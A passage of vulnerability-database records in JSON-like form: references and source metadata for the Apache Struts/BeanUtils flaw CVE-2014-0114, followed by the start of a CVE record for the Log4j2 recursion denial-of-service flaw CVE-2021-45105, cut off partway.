"http://www-01.ibm.com/support/docview.wss?uid=swg21680716", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21675387", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21677802", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674310", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674191", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674017", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674016", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674339", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677449", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675496", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676485", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21677298", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674613", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676091", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673878", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673877", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674113", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674905", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21679331", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21680698", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037424", }, { trust: 0.9, url: "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21680194", }, { trust: 0.9, url: "http://jvn.jp/en/jp/jvn30962312/index.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677352", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037622", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10872142", }, { trust: 0.6, url: "https://issues.apache.org/jira/browse/beanutils-520", }, { trust: 0.6, url: "https://www.mail-archive.com/announce@apache.org/msg05413.html", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887121", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10957873", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887119", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887113", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10888007", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887999", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887973", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10888009", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/75922", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.2568/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1427/", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/6494701", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.2355/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2293.2/", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10879093", }, { trust: 0.6, url: "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/78218", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.3134/", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2022072128", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/", }, { trust: 0.3, url: "http://struts.apache.org/", }, { trust: 0.3, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674379", }, { trust: 0.3, url: "www-01.ibm.com/support/docview.wss?uid=swg21677335", }, { trust: 0.3, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.3, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.3, url: "https://bugzilla.redhat.com/):", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2014-0114", }, { trust: 0.2, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/", }, { trust: 0.2, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/", }, { trust: 0.2, url: "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000129", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1271", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000342", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000352", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000346", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1114", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-5397", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-14063", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000343", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-14063", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000130", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000342", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000352", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1114", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1272", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000346", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000339", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000340", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000341", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000341", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.1/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-8088", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000343", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-8036", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000344", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000345", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1272", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse&downloadtype=distributions&version=7.1.0", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000340", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000129", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1339", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1339", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000338", }, { trust: 0.1, url: "https://access.redhat.com/articles/2939351", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000339", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1271", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000130", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-8036", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-8088", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-5397", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000344", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000345", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise&downloadtype=securitypatches&version=7.1.0", }, { trust: 0.1, url: "https://www.redhat.com/security/data/cve/cve-2014-0114.html", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://www.openwall.com/ove/", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00321", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00320", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00322", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00324", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00318", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00319", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00316", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00315", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00323", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00317", }, { trust: 0.1, url: "http://creativecommons.org/licenses/by-sa/2.5", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114", }, { trust: 0.1, url: "https://security.gentoo.org/", }, { trust: 0.1, url: "https://bugs.gentoo.org.", }, { trust: 0.1, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.amq.broker&version=7.5.0", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/", }, { trust: 0.1, url: "https://softwaresupport.hpe.com>.", }, { trust: 0.1, url: "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets", }, { trust: 0.1, url: "http://www.hpe.com/support/security_bulletin_archive", }, { trust: 0.1, url: "https://www.hpe.com/info/report-security-vulnerability", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-0763", }, { trust: 0.1, url: "http://www.hpe.com/support/subscriber_choice", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3253", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0107", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2013-6429", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0050", }, { trust: 0.1, url: "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-5652", }, { trust: 0.1, url: "http://twitter.com/rgielen", }, { trust: 0.1, url: "http://struts.apache.org/struts1eol-announcement.html", }, { trust: 0.1, url: "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-applications/ba-p/6463188#.u2j7xeasxro", }, ], sources: [ { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2014-04-30T00:00:00", db: "VULMON", id: "CVE-2014-0114", }, { date: "2014-04-29T00:00:00", db: "BID", id: "67121", }, { date: "2018-09-11T15:41:48", db: "PACKETSTORM", id: "149311", }, { date: "2014-05-14T19:25:00", db: "PACKETSTORM", id: "126619", }, { date: "2014-05-19T03:19:48", db: "PACKETSTORM", id: "126692", }, { date: "2018-08-23T17:19:18", db: "PACKETSTORM", id: "149050", }, { date: "2014-08-14T22:49:43", db: "PACKETSTORM", id: "127868", }, { date: "2016-07-20T18:29:00", db: "PACKETSTORM", id: "137980", }, { date: "2019-10-10T14:43:55", db: "PACKETSTORM", id: "154792", }, { date: "2014-10-28T18:09:30", db: "PACKETSTORM", id: "128873", }, { date: "2016-11-15T00:42:48", db: "PACKETSTORM", id: "139721", }, { date: "2014-05-03T02:09:52", db: "PACKETSTORM", id: "126455", }, { date: "2014-04-30T00:00:00", db: "CNNVD", id: "CNNVD-201404-581", }, { date: "2014-04-30T10:49:03.973000", db: "NVD", id: "CVE-2014-0114", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2023-02-13T00:00:00", db: "VULMON", id: "CVE-2014-0114", }, { date: "2019-07-17T07:00:00", db: "BID", id: "67121", }, { date: "2023-04-14T00:00:00", db: "CNNVD", id: "CNNVD-201404-581", }, { date: "2024-11-21T02:01:23.960000", db: "NVD", id: "CVE-2014-0114", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "137980", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 1, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts Input validation error vulnerability", sources: [ { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 0.6, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "input validation error", sources: [ { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 0.6, }, }
cve-2021-45105
Vulnerability from cvelistv5
Published
2021-12-18 11:55
Modified
2024-08-04 04:39
Severity ?
EPSS score ?
Summary
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j2 |
Version: log4j-core < 2.17.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T04:39:20.295Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_refsource_CERT-VN", "x_transferred", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", tags: [ "vendor-advisory", "x_refsource_CISCO", "x_transferred", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j2", vendor: "Apache Software Foundation", versions: [ { changes: [ { at: "2.13.0", status: "affected", }, { at: "2.12.3", status: "unaffected", }, { at: "2.4", status: "affected", }, { at: "2.3.1", status: "unaffected", }, { at: "2.0-alpha1", status: "affected", }, ], lessThan: "2.17.0", status: "affected", version: "log4j-core", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro’s Zero Day Initiative, and another anonymous vulnerability researcher", }, ], descriptions: [ { lang: "en", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-20", description: "CWE-20 Improper Input Validation", lang: "en", type: "CWE", }, ], }, { descriptions: [ { cweId: "CWE-674", description: "CWE-674: Uncontrolled 